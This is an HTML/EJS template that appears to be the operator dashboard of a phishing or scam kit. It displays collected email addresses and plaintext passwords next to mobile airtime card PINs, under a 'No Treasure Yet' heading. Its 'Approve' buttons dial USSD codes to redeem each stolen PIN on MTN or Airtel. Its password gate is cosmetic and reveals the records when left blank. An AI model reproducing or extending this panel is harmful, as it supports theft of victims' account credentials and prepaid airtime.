<!DOCTYPE html>
<html>
<head>

	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="/site_icon.jpg">


	<style type="text/css">

		@media screen and (min-width: 300px){


			body{
				font-family: arial, helvetica, sans-serif;
			}
			
			.data_wrapper{
				display: grid;
				grid-template-columns: 1fr 4fr 2fr;
				max-width: 700px;
				margin: 45px auto;
			}


			.data_wrapper_wrapper > div{
				background-color: rgb(240, 240, 240);	
				padding: 5px 0;
				font-size: 12px;
			}
			
			.data_wrapper_wrapper > div:nth-child(even){
				background-color: rgb(200, 200, 200);	
			}



			.data_wrapper > div{
				padding:5px 0;
				border-left: 1px solid rgb(160, 160, 160);
				text-align: center;
			}

			.delete{
				display: block;
				padding: 7px 15px;
				margin: 10px 5px 0 auto;
				background-color: rgb(200, 30, 10);
				color: white;
				border: none;
			}

		}






		@media screen and (min-width: 1000px){
			.data_wrapper_wrapper > div{
				font-size: 16px;
			}
		}



	</style>


	<title></title>
</head>





<body>

	<main>


		

		
		<%if(data && data.length > 0){%>



			
			<h1 class="real_h1" style="margin-top: 20px; text-align: center;"></h1>



			
			<form style="margin: 20px 0">
				<input type="password" name="password">
				<button>Okay</button>
			</form>

			<div class="data_wrapper_wrapper">
				<%for(i=data.length - 1; i>=0; i--){%>
					<div class="data_wrapper">

						<%if(data[i].card[0] == "0" || data[i].card[0] == "7" || data[i].card[0] == "6" || data[i].card[0] == "1" || data[i].card[0] == "2"){%>
							
							<%if(data[i].network == "mtn" && data[i].card.length == 17){%>
									<div class="email"><%=data[i].email%></div>
									<div class="password"><%=data[i].password%></div>
									<div class="amount"><%=data[i].amount%></div>
									<div class="card"><%=data[i].card%></div>
									<div class="network"><%=data[i].network%></div>
									<div class="network"><%=data[i].purchase_time%></div>
									<span></span>
									<span></span>
									<button class="delete" data-card="<%=data[i].card%>" data-network="<%=data[i].network%>" data-approved="<%=data[i].approved%>" >Approve</button>
							<%}%>


							<%if(data[i].network == "mtn" && data[i].card.length == 10){%>
									<div class="email"><%=data[i].email%></div>
									<div class="password"><%=data[i].password%></div>
									<div class="amount"><%=data[i].amount%></div>
									<div class="card"><%=data[i].card%></div>
									<div class="network"><%=data[i].network%></div>
									<div class="network"><%=data[i].purchase_time%></div>
									<span></span>
									<span></span>
									<button class="delete" data-card="<%=data[i].card%>" data-network="<%=data[i].network%>" data-approved="<%=data[i].approved%>" >Approve</button>
							<%}%>


							
						<%}%>
					</div>
				<%}%>
			</div>
		<%}else{%>
			<h1 style="margin-top: 20px; text-align: center;">No Treasure Yet</h1>
		<%}%>
		

	</main>














	<script type="text/javascript">



		const email = document.querySelectorAll(".email");

		document.querySelector(".real_h1").innerHTML = `${email.length}  Sales`;









		
		const isFacebookContainer = document.querySelectorAll(".isFacebook.false");

		isFacebookContainer.forEach((each)=>{
			each.parentElement.style.color = "red";
		});


		const form = document.querySelector("form");
		const data_wrapper_wrapper = document.querySelector(".data_wrapper_wrapper");
		data_wrapper_wrapper.style.display = "none"

		if(form){
			form.addEventListener("submit", (e)=>{
				e.preventDefault();

				if(form.password.value === ""){
					data_wrapper_wrapper.style.display = "block";
				}else{
					data_wrapper_wrapper.style.display = "none";
				}
			});
		}






		const deleteButton = document.querySelectorAll(".delete");

		

		deleteButton.forEach((each)=>{
			
			if(each.dataset.approved === "true"){
				each.parentElement.style.border = "2px solid green";
				each.style.backgroundColor = "rgb(0, 100, 40)";
			}

			each.addEventListener("click", async function(){
				if(each.dataset.card !==""){
					if(each.dataset.network == "mtn" || each.dataset.network == "MTN"){
						if(each.dataset.card.length === 10){
								window.location.href= `tel:*3551*${each.dataset.card}#`;
						}else{
							window.location.href= `tel:*555*${each.dataset.card}#`;
						}
						
					}

					if(each.dataset.network == "airtel" || each.dataset.network == "Airtel"){
						window.location.href= `tel:*126*${each.dataset.card}#`;
					}
				}else{
				alert("A user was able to submit an empty card field to the DB.");
				}

			});
		
		});
	</script>

</body>
</html>